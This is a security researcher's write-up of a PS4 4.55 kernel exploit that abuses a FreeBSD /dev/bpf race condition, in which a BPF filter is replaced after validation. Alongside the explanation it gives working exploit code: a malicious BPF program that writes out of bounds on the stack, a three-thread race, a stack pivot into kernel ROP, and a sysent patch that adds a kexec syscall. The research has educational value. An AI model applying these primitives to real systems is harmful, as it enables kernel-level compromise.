Permalink
Switch branches/tags
Nothing to show
Find file Copy path
b586e84 Mar 29, 2018
1 contributor

Users who have contributed to this file

506 lines (405 sloc) 29.8 KB

Note: While this bug is primarily interesting for exploitation on the PS4, this bug can also potentially be exploited on other unpatched platforms using FreeBSD if the attacker has read/write permissions on /dev/bpf, or if they want to escalate from root user to kernel code execution. As such, I've published it under the "FreeBSD" folder and not the "PS4" folder.

Introduction

Welcome to the kernel portion of the PS4 4.55FW full exploit chain write-up. This bug was found by qwerty, and is fairly unique in the way it's exploited, so I wanted to do a detailed write-up on how it worked. The full source of the exploit can be found here. I've previously covered the webkit exploit implementation for userland access here.

Throwback to 4.05

If you read my 4.05 kernel exploit write-up, you may have noticed that I left out how I managed to dump the kernel before obtaining code execution. I also left out the target object that was used before the cdev object. This target object was indeed, bpf_d. Because at the time this exploit involving BPF was not public and was a 0-day, I ommited it from my write-up and rewrote the exploit to use an entirely different object (this turned out to be for the better, as cdev turned out to be more stable anyways).

BPF was a nice target object for 4.05, as not only did it contain function pointers to jumpstart code execution, but also had a method for obtaining an arbitrary read primitive which I will detail below. While it's not entirely needed, it is helpful in the way that we don't have to write dumper code later. This section is not very relevant to the 4.55 exploit, so I will keep it brief, but feel free to skip this section if you only care about 4.55.

The bpf_d object has fields related to "slots" for storing data. Since this section is just a tidbit for an older exploit, I will only include the fields relevant to this section.

src

struct bpf_d {
    // ...
    caddr_t         bd_hbuf;        /* hold slot */ // Offset: 0x18
    // ...
    int             bd_hlen;        /* current length of hold buffer */ // Offset: 0x2C
    // ...
    int             bd_bufsize;     /* absolute length of buffers */ // Offset: 0x30
    // ...
}

These slots are used to hold the information that gets sent back to someone who would read() on the bpf's file descriptor. By setting the offset at 0x18 (bd_hbuf) to the address of the location we want to dump, and 0x2C and 0x30 (bd_hlen and bd_bufsize respectively) to any size we choose (to dump the entire kernel, I chose 0x2800000), we can obtain an arbitrary kernel read primitive via the read() system call on the bpf file descriptor, and easily dump kernel memory.

FreeBSD or Sony's fault? Why not both...

Interestingly, this bug is actually a FreeBSD bug and was not (at least directly) introduced by Sony code. While this is a FreeBSD bug however, it's not very useful for most systems because the /dev/bpf device driver is root-owned, and the permissions for it are set to 0600 (meaning owner has read/write privileges, and nobody else does) - though it can be used for escalating from root to kernel mode code execution. However, let’s take a look at the make_dev() call inside the PS4 kernel for /dev/bpf (taken from a 4.05 kernel dump).

seg000:FFFFFFFFA181F15B                 lea     rdi, unk_FFFFFFFFA2D77640
seg000:FFFFFFFFA181F162                 lea     r9, aBpf        ; "bpf"
seg000:FFFFFFFFA181F169                 mov     esi, 0
seg000:FFFFFFFFA181F16E                 mov     edx, 0
seg000:FFFFFFFFA181F173                 xor     ecx, ecx
seg000:FFFFFFFFA181F175                 mov     r8d, 1B6h
seg000:FFFFFFFFA181F17B                 xor     eax, eax
seg000:FFFFFFFFA181F17D                 mov     cs:qword_FFFFFFFFA34EC770, 0
seg000:FFFFFFFFA181F188                 call    make_dev

We see UID 0 (the UID for the root user) getting moved into the register for the 3rd argument, which is the owner argument. However, the permissions bits are being set to 0x1B6, which in octal is 0666. This means anyone can open /dev/bpf with read/write privileges. I’m not sure why this is the case, qwerty speculates that perhaps bpf is used for LAN gaming. In any case, this was a poor design decision because bpf is usually considered privileged, and should not be accessible to a process that is completely untrusted, such as WebKit. On most platforms, permissions for /dev/bpf will be set to 0x180, or 0600.

Race Conditions - What are they?

The class of the bug abused in this exploit is known as a "race condition". Before we get into bug specifics, it's important for the reader to understand what race conditions are and how they can be an issue (especially in something like a kernel). Often in complex software (such as a kernel), resources will be shared (or "global"). This means other threads could potentially execute code that will access some resource that could be accessed by another thread at the same point in time. What happens if one thread accesses this resource while another thread does without exclusive access? Race conditions are introduced.

Race conditions are defined as possible scenarios where events happen in a sequence different than the developer intended which leads to undefined behavior. In simple, single-threaded programs, this is not an issue because execution is linear. In more complex programs where code can be running in parallel however, this becomes a real issue. To prevent these problems, atomic instructions and locking mechanisms were introduced. When one thread wants to access a critical resource, it will attempt to acquire a "lock". If another thread is already using this resource, generally the thread attempting to acquire the lock will wait until the other thread is finished with it. Each thread must release the lock to the resource after they're done with it, failure to do so could result in a deadlock.

While locking mechanisms such as mutexes have been introduced, developers sometimes struggle to use them properly. For example, what if a piece of shared data gets validated and processed, but while the processing of the data is locked, the validation is not? There is a window between validation and locking where that data can change, and while the developer thinks the data has been validated, it could be substituted with something malicious after it is validated, but before it is used. Parallel programming can be difficult, especially when, as a developer, you also want to factor in the fact that you don't want to put too much code in between locking and unlocking as it can impact performance.

For more on race conditions, see Microsoft's page on it here

Packet Filters - What are they?

Since the bug is directly in the filter system, it is important to know the basics of what packet filters are. Filters are essentially sets of pseudo-instructions that are parsed by bpf_filter(). While the pseudo-instruction set is fairly minimal, it allows you to do things like perform basic arithmetic operations and copy values around inside it's buffer. Breaking down the BPF VM in it's entirety is far beyond the scope of this write-up, just know that the code produced by it is ran in kernel mode - this is why read/write access to /dev/bpf should be privileged.

You can reference the opcodes that the BPF VM takes here.

Out-of-bounds Write Primitive

If we take a look at the "STOREX" mnemonic's handler in bpf_filter(), we see the following code:

src

u_int32_t mem[BPF_MEMWORDS];
// ...
case BPF_STX:
    mem[pc->k] = X;
    continue;

This is immediately interesting to us as exploit developers. If we can set pc->k to any arbitrary value, we can use this to establish an out-of-bounds write primitive on the stack. This can be extremely helpful, for instance, we can use this to corrupt the return pointer stored on the stack so when bpf_filter() returns we can start a ROP chain. This is perfect, because not only is it a trivial attack strategy to implement, but it is also stable as we don't have to worry about the issues that typically come with classic stack/heap smashing.

Unfortunately, instructions run through a validator, so trying to set pc->k in a way that would be outside the boundaries of mem will fail the validation check. But what if malicious instructions could be substituted in post-validation? There would be a "time of check, time of use" (TOCTOU) issue present.

Race, Replace

Setting Filters

If we take a look at bpfioctl(), you'll notice there are various commands for managing the interface, setting buffer properties, and of course, setting up read/write filters (a list of these commands can be found on the FreeBSD man page. If we pass the "BIOSETWF" command (noted by 0x8010427B in low-level), you'll notice that bpf_setf() is called to set a filter on the given device.

src

case BIOCSETF:
case BIOCSETFNR:
case BIOCSETWF:
#ifdef COMPAT_FREEBSD32
case BIOCSETF32:
case BIOCSETFNR32:
case BIOCSETWF32:
#endif
    error = bpf_setf(d, (struct bpf_program *)addr, cmd);
    break;

If you look at where the instructions are copied into kernel, you'll also see that bpf_validate() will run immediately, meaning at this point we cannot specify a pc->k value that allows out-of-bounds access.

src

// ...

size = flen * sizeof(*fp->bf_insns);
fcode = (struct bpf_insn *)malloc(size, M_BPF, M_WAITOK);

if (copyin((caddr_t)fp->bf_insns, (caddr_t)fcode, size) == 0 && bpf_validate(fcode, (int)flen)) {
    // ...
}

// ...

Lack of Ownership

We've taken a look at the code that sets a filter, now let's take a look at the code that uses a filter. The function bpfwrite() is called when a process calls the write() system call on a valid bpf device. We can see this via the following function table for bpf's backing cdevsw:

src

static struct cdevsw bpf_cdevsw = {
    .d_version =    D_VERSION,
    .d_open =       bpfopen,
    .d_read =       bpfread,
    .d_write =      bpfwrite,
    .d_ioctl =      bpfioctl,
    .d_poll =       bpfpoll,
    .d_name =       "bpf",
    .d_kqfilter =   bpfkqfilter,
};

The purpose of bpfwrite() is to allow the user to write packets to the interface. Any packets passed into bpfwrite() will pass through the write filter that is set on the interface, which is set via the IOCTL that is detailed in the "Setting Filters" sub-section.

It first does some privilege checks (which are irrelevant because on the PS4, any untrusted process can successfully write to it due to everyone having R/W permissions on the device), and sets up some buffers before calling bpf_movein().

src

bzero(&dst, sizeof(dst));
m = NULL;
hlen = 0;
error = bpf_movein(uio, (int)d->bd_bif->bif_dlt, ifp, &m, &dst, &hlen, d->bd_wfilter);
if (error) {
	d->bd_wdcount++;
	return (error);
}
d->bd_wfcount++;

Let's take a look at bpf_movein().

src

*mp = m;

if (m->m_len < hlen) {
    error = EPERM;
    goto bad;
}

error = uiomove(mtod(m, u_char *), len, uio);
if (error)
    goto bad;
  
slen = bpf_filter(wfilter, mtod(m, u_char *), len, len);
if (slen == 0) {
    error = EPERM;
    goto bad;
}

Notice, there is absolutely no locking present in bpf_movein(), nor in bpfwrite() - the caller. Therefore, bpf_filter(), the function that executes a given filter program on the device, is called in an unlocked state. Additionally, bpf_filter() itself doesn't do any locking. No ownership is maintained or even obtained in the process of executing the write filter. What would happen if this filter was free()'d after it was validated via bpf_setf() when setting the filter, and was reallocated with invalid instructions while the filter is executing? :)

By racing three threads (one setting a valid, non-malicious filter, one setting an invalid, malicious filter, and one trying to continously write() to bpf), there is a possible (and very exploitable) scenario where valid instructions can be replaced with invalid instructions, and we can influence pc->k to write out-of-bounds on the stack.

Freeing the Filter

We need a method to be able to free() the filter in another thread while it's still running to trigger a use-after-free() situation. Looking at bpf_setf(), notice that before allocating a new buffer for the filter instructions, it will first check if there is an old one - if there is it will destroy it.

src

static int bpf_setf(struct bpf_d *d, struct bpf_program *fp, u_long cmd) {
    struct bpf_insn *fcode, *old;
    
    // ...
    
    if (cmd == BIOCSETWF) {
        old = d->bd_wfilter;
        wfilter = 1;
        // ...
    } else {
        wfilter = 0;
        old = d->bd_rfilter;
        // ...
    }
    
    // ...
    
    if (old != NULL)
        free((caddr_t)old, M_BPF);
        
    // ...
    
    fcode = (struct bpf_insn *)malloc(size, M_BPF, M_WAITOK);
    
    // ...
    
    if (wfilter)
        d->bd_wfilter = fcode;
    else {
        d->bd_rfilter = fcode;
        // ...
        if (cmd == BIOCSETF)
            reset_d(d);
        }
    }
    
    // ...
}

Because bpf_filter() has a copy of d->bd_wfilter, when it is free()'d in one thread to replace the filter, the second thread will also use the same pointer (which is now free()'d) resulting in a use-after-free(). The thread attempting to set an invalid filter effectively ends up spraying the heap as a result, and will eventually get allocated into the same address. Our three threads will do the following:

  1. Continously set a filter with valid instructions, passing the validation checks.
  2. Continously set another filter with invalid instructions, freeing and replacing the old instructions with new ones (our malicious ones).
  3. Continously write to bpf. Eventually, the "valid" filter will be corrupted with the invalid one post-validation and write() will use it resulting in memory corruption. Specially crafted instructions can be used to overwrite the return address on the stack to obtain code execution in kernel mode.

Setting a Valid Program

Firstly, we need to setup a bpf_program object to pass to the ioctl() for setting a filter. The structure for bpf_program is below:

src

struct bpf_program {                // Size: 0x10
    u_int bf_len;                   // 0x00
    struct bpf_insn *bf_insns;      // 0x08
};

It's important to note that bf_len is not the size of the program's instructions in bytes, but rather the length. This means the value we specify for bf_len will be the total size of our instructions in memory divided by the size of an instruction, which is eight.

src

struct bpf_insn {                   // Size: 0x08
    u_short         code;           // 0x00
    u_char          jt;             // 0x02
    u_char          jf;             // 0x03
    bpf_u_int32     k;              // 0x04
};

A valid program is easy to write, we can simply write a bunch of NOP (no operation) psueod-instructions with a "return" pseudo-instruction at the end. By looking at bpf.h, we can determine that the opcodes we can use for a NOP and a RET are 0x00 and 0x06 respectively.

src

#define         BPF_LD          0x00 // By specifying 0's for the args it effectively does nothing
#define         BPF_RET         0x06

Below is a code snippet from the exploit implemented in JS ROP chains to setup a valid BPF program in memory:

// Setup valid program
var bpf_valid_prog          = malloc(0x10);
var bpf_valid_instructions  = malloc(0x80);

p.write8(bpf_valid_instructions.add32(0x00), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x08), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x10), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x18), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x20), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x28), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x30), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x38), 0x00000000);
p.write4(bpf_valid_instructions.add32(0x40), 0x00000006);
p.write4(bpf_valid_instructions.add32(0x44), 0x00000000);

p.write8(bpf_valid_prog.add32(0x00), 0x00000009);
p.write8(bpf_valid_prog.add32(0x08), bpf_valid_instructions);

Setting an Invalid Program

This program is where we want to write our malicious code that will corrupt memory on the stack when executed via write(). This program is almost as simple as the valid program, as it only contains 9 psuedo-instructions. We can abuse the "LDX" and "STX" instructions to write data on the stack, by first loading the value we want to load (32-bits) into the index register, then storing index register into an index of what should be scratch memory, however due to the instructions being invalid, it will actually write out-of-bounds and corrupt the function's return pointer. Here is an outline of the instructions we want to run in our malicious filter:

LDX X <- {lower 32-bits of stack pivot gadget address (pop rsp)}
STX M[0x1E] <- X
LDX X <- {upper 32-bits of stack pivot gadget address (pop rsp)}
STX M[0x1F] <- X
LDX X <- {lower 32-bits of kernel ROP chain fake stack address}
STX M[0x20] <- X
LDX X <- {upper 32-bits of kernel ROP chain fake stack address}
STX M[0x21] <- X
RET

Note the type of mem being of type u_int32_t, this is the reason our writes are increasing by only 1 instead of 4. Let's take a look at mem's full definition:

src

#define BPF_MEMWORDS 16
// ...
u_int32_t mem[BPF_MEMWORDS];

Notice, the buffer is only allocated for 58 bytes (16 values * 4 bytes per value) - but our instructions are accessing indexes 30, 31, 32, and 33, which are obviously way out of bounds of the buffer. Because the filter was substituted in post-validation, nothing catches this and thus an OOB write is born.

Index 0x1E and 0x1F (30 and 31) is the location on the stack of the return address. By overwriting it with the address of a pop rsp; ret; gadget and writing the value we want to pop into the RSP register at index 0x20 and 0x21 (32 and 33), we can successfully pivot the stack to that of our fake stack for our kernel ROP chain to obtain code execution in ring0.

Below is a code snippet from the exploit to setup an invalid, malicious BPF program in memory:

// Setup invalid program
var entry = window.gadgets["pop rsp"];
var bpf_invalid_prog          = malloc(0x10);
var bpf_invalid_instructions  = malloc(0x80);

p.write4(bpf_invalid_instructions.add32(0x00), 0x00000001);
p.write4(bpf_invalid_instructions.add32(0x04), entry.low);
p.write4(bpf_invalid_instructions.add32(0x08), 0x00000003);
p.write4(bpf_invalid_instructions.add32(0x0C), 0x0000001E);
p.write4(bpf_invalid_instructions.add32(0x10), 0x00000001);
p.write4(bpf_invalid_instructions.add32(0x14), entry.hi);
p.write4(bpf_invalid_instructions.add32(0x18), 0x00000003);
p.write4(bpf_invalid_instructions.add32(0x1C), 0x0000001F);
p.write4(bpf_invalid_instructions.add32(0x20), 0x00000001);
p.write4(bpf_invalid_instructions.add32(0x24), kchainstack.low);
p.write4(bpf_invalid_instructions.add32(0x28), 0x00000003);
p.write4(bpf_invalid_instructions.add32(0x2C), 0x00000020);
p.write4(bpf_invalid_instructions.add32(0x30), 0x00000001);
p.write4(bpf_invalid_instructions.add32(0x34), kchainstack.hi);
p.write4(bpf_invalid_instructions.add32(0x38), 0x00000003);
p.write4(bpf_invalid_instructions.add32(0x3C), 0x00000021);
p.write4(bpf_invalid_instructions.add32(0x40), 0x00000006);
p.write4(bpf_invalid_instructions.add32(0x44), 0x00000001);

p.write8(bpf_invalid_prog.add32(0x00), 0x00000009);
p.write8(bpf_invalid_prog.add32(0x08), bpf_invalid_instructions);

Creating and Binding Devices

To setup the corruption portion of the race, we need to open two instances of /dev/bpf. We will then bind them to a valid interface - the interface you bind to matters depending on how the system is connected to the network. If it is a wired (ethernet) connection, you'll want to bind to the "eth0" interface, if you're connected via wifi you'll want to bind to the "wlan0" interface. The exploit automatically determines which interface to use by performing a test. The test essentially attempts to write() to the given interface, if it is invalid, write() will fail and return -1. If this occurs after binding to the "eth0" interface, the exploit will attempt to rebind to "wlan0" and checks again. If write() again returns -1, the exploit bails and reports that it failed to bind the device.

// Open first device and bind
var fd1 = p.syscall("sys_open", stringify("/dev/bpf"), 2, 0); // 0666 permissions, open as O_RDWR

p.syscall("sys_ioctl", fd1, 0x8020426C, stringify("eth0")); // 8020426C = BIOCSETIF

if (p.syscall("sys_write", fd1, spadp, 40).low == (-1 >>> 0)) {
    p.syscall("sys_ioctl", fd1, 0x8020426C, stringify("wlan0"));

    if (p.syscall("sys_write", fd1, spadp, 40).low == (-1 >>> 0)) {
        throw "Failed to bind to first /dev/bpf device!";
    }
}

The same process is then repeated for the second device.

Setting Filters in Parallel

To cause memory corruption we need two threads running in parallel which continously set filters on their own devices. Eventually, the valid filter will be free()'d, reallocated, and corrupted with the invalid filter. To do this, each thread essentially does the following (pseudo-code):

// 0x8010427B = BIOCSETWF
void threadOne() // Sets a valid program
{
    for(;;)
    {
        ioctl(fd1, 0x8010427B, bpf_valid_program);
    }
}

void threadTwo() // Sets an invalid program
{
    for(;;)
    {
        ioctl(fd2, 0x8010427B, bpf_invalid_program);
    }
}

Triggering Code Execution

So we can corrupt the filters and substitute in our invalid instructions, but we need the filter to actually get ran to trigger code execution via the corrupted return address. Since we're setting a "write" filter, bpfwrite() is a perfect candidate to do this. This means we need a third thread to run that will constantly write() to the first bpf device. When the filter eventually gets corrupted, the next write() will run the invalid filter, causing the stack memory to be corrupted, and will jump to any address we specify allowing us to (fairly trivially) obtain code execution in ring0.

void threadThree() // Tries to trigger code execution
{
    void *scratch = (void *)malloc(0x200);
    
    for(;;)
    {
        uint64_t n = write(fd1, scratch, 0x200);
        
        if(n == 0x200))
        {
            break;
        }
    }
}

Installing a "kexec()" syscall

Our ultimate goal with the kROP chain is to install a custom system call that will execute code in kernel mode. To keep things consistent with 4.05, we again will use syscall #11. The signature of the syscall will be as follows:

sys_kexec(void *code, void *uap);

Doing this is fairly trivial, we just have to add an entry into the sysent table. An entry in the sysent table follows the this structure:

src

struct sysent {		        	/* system call table */
	int	sy_narg;	        /* number of arguments */
	sy_call_t *sy_call;	    	/* implementing function */
	au_event_t sy_auevent;		/* audit event associated with syscall */
	systrace_args_func_t sy_systrace_args_func;
				        /* optional argument conversion function. */
	u_int32_t sy_entry;	    	/* DTrace entry ID for systrace. */
	u_int32_t sy_return;		/* DTrace return ID for systrace. */
	u_int32_t sy_flags;	    	/* General flags for system calls. */
	u_int32_t sy_thrcnt;
};

Our main points of interest are sy_narg and sy_call. We'll want to set sy_narg to 2 (one for the address to execute, the second for passing arguments). The sy_call member we'll want to set to a gadget that will jmp to the RSI register, since the address of the code to execute will be passed through RDI (remember, while the first argument is normally passed in the RDI register, in syscalls, RDI is occupied by the thread descriptor td). A jmp qword ptr [rsi] gadget does what we need, and can be found in the kernel at offset 0x13a39f.

LOAD:FFFFFFFF8233A39F       FF 26          jmp qword ptr [rsi] 

In a 4.55 kernel dump, we can see the offset for the sysent entry for syscall 11 is 0xC2B8A0. As you can see, the implementing function is nosys, so it's perfectly fine to overwrite.

_61000010:FFFFFFFF8322B8A0                 dq 0                    ; Syscall #11
_61000010:FFFFFFFF8322B8A8                 dq offset nosys
_61000010:FFFFFFFF8322B8B0                 dq 0
_61000010:FFFFFFFF8322B8B8                 dq 0
_61000010:FFFFFFFF8322B8C0                 dq 0
_61000010:FFFFFFFF8322B8C8                 dq 400000000h

By writing 2 to 0xC2B8A0, [kernel base + 0x13a39f] to 0xC2B8A8, and 100000000 to 0xC2BBC8 (we want to change the flags from SY_THR_ABSENT to SY_THR_STATIC), we can successfully insert a custom system call that will execute any code given in kernel mode!

Sony's "Patch"

The section header is a lie. Sony didn't actually patch this issue, however they did know that something wonky was going on with BPF as a crash dump accidentally made it to Sony servers from a kernel panic. Via a simple stack trace, they determined that the return address of bpfwrite() was corrupted. Sony couldn't seem to figure out how, so they decided to just strip bpfwrite() out of the kernel entirely - the #SonyWay. Luckily for them, after many hours of searching, it seems there are no other useful primitives to leverage the filter corruption, so the bug is sadly dead.

Pre-Patch BPF cdevsw:

bpf_devsw       dd 17122009h            ; d_version
                                        ; DATA XREF: sub_FFFFFFFFA181F140+1B↑o
                dd 80000000h            ; d_flags
                dq 0FFFFFFFFA1C92250h   ; d_name
                dq 0FFFFFFFFA181F1B0h   ; d_open
                dq 0                    ; d_fdopen
                dq 0FFFFFFFFA16FD1C0h   ; d_close
                dq 0FFFFFFFFA181F290h   ; d_read
                dq 0FFFFFFFFA181F5D0h   ; d_write
                dq 0FFFFFFFFA181FA40h   ; d_ioctl
                dq 0FFFFFFFFA1820B30h   ; d_poll
                dq 0FFFFFFFFA16FF050h   ; d_mmap
                dq 0FFFFFFFFA16FF970h   ; d_strategy
                dq 0FFFFFFFFA16FF050h   ; d_dump
                dq 0FFFFFFFFA1820C90h   ; d_kqfilter
                dq 0                    ; d_purge
                dq 0FFFFFFFFA16FF050h   ; d_mmap_single
                dd -5E900FB0h, -1, 0    ; d_spare0
                dd 3 dup(0)             ; d_spare1
                dq 0                    ; d_devs
                dd 0                    ; d_spare2
                dq 0                    ; gianttrick
                dq 4EDE80000000000h     ; postfree_list

Post-Patch BPF cdevsw:

bpf_devsw       dd 17122009h            ; d_version
                                        ; DATA XREF: sub_FFFFFFFF9725DB40+1B↑o
                dd 80000000h            ; d_flags
                dq 0FFFFFFFF979538ACh   ; d_name
                dq 0FFFFFFFF9725DBB0h   ; d_open
                dq 0                    ; d_fdopen
                dq 0FFFFFFFF9738D230h   ; d_close
                dq 0FFFFFFFF9725DC90h   ; d_read
                dq 0h                   ; d_write
                dq 0FFFFFFFF9725E050h   ; d_ioctl
                dq 0FFFFFFFF9725F0B0h   ; d_poll
                dq 0FFFFFFFF9738F050h   ; d_mmap
                dq 0FFFFFFFF9738F920h   ; d_strategy
                dq 0FFFFFFFF9738F050h   ; d_dump
                dq 0FFFFFFFF9725F210h   ; d_kqfilter
                dq 0                    ; d_purge
                dq 0FFFFFFFF9738F050h   ; d_mmap_single
                dd 9738F050h, 0FFFFFFFFh, 0; d_spare0
                dd 3 dup(0)             ; d_spare1
                dq 0                    ; d_devs
                dd 0                    ; dev_spare2
                dq 0                    ; gianttrick
                dq 51EDE0000000000h     ; postfree_list

Notice the data for d_write is no longer a valid function pointer.

Conclusion

This was a pretty cool bug to exploit and write-up. While the bug is not incredibly helpful on most other systems as it cannot be exploited from an unprivileged user, it is still valid as a method of going from root to ring0 code execution. I thought this would be a cool bug to write-up (plus I love writing them anyway) as the attack strategy is fairly unique (using a race condition to trigger an out-of-bounds write on the stack). It's also a fairly trivial exploit to implement, and the strategy of overwriting the return pointer on the stack is an easy method for learning security researchers to understand. It also highlights how while an attack strategy may be old, perhaps this one being the oldest there is - they can still be applied in modern exploitation with slight variations.

Credits

qwertyoruiopz

References

Watson FreeBSD Kernel Cross Reference

Microsoft Support : Description of race conditions and deadlocks